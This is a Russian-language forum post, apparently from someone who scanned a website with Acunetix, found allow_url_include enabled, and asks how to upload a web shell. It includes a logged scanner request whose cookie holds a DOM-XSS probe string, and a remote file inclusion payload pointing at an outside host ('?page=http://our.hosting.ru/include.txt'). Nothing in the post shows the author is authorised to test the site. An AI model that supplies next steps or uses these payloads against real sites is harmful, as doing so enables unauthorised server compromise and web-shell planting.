Доброго времени всем. Просканил сайт Acunetix'ом.
IMAGE https://image.prntscr.com/image/L-o9hPwLTFOA-wXUwbbnBA.png
В отчёте написано, что в настройках сервера не отключён
allow_url_include
Сами настройки:
IMAGE https://image.prntscr.com/image/X6kFF5MjQ-6gPsCh3lkCUA.png
Отчёт:
code:
GET /info.php HTTP/1.1
Cookie: _ym_uid=14984435435718202328; was=true; _ym_isad=2; _ym_visorc_43544474=w; _ym_visorc_3085454966=w; jv_enter_ts_BVXa68GV9s=13284253266961; jv_visits_count_BVXa68GV9s=1; jv_refer_BVXa68GV9s=http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0% 2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); jv_utm_BNXa68GV9s=; jv_pages_count_BNXa68GV9s=1; close_popup=true; jv_close_time_BNXa68GV9s=1498425912526; core=r9sqq4hc8g39434fl4p9rjo1ur3; yandexuid=1459332343535345929; yp=1814355929.yrts.149843459; yabs-sid=41424093453455929
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Подскажите пожалуйста, есть ли варианты залить шелл? Если да, какие должны быть мои дальнейшие действия?
Не могу понять, в каком url подставлять:
?page=http://our.hosting.ru/include.txt
И что если на сайте нет страниц с параметрами?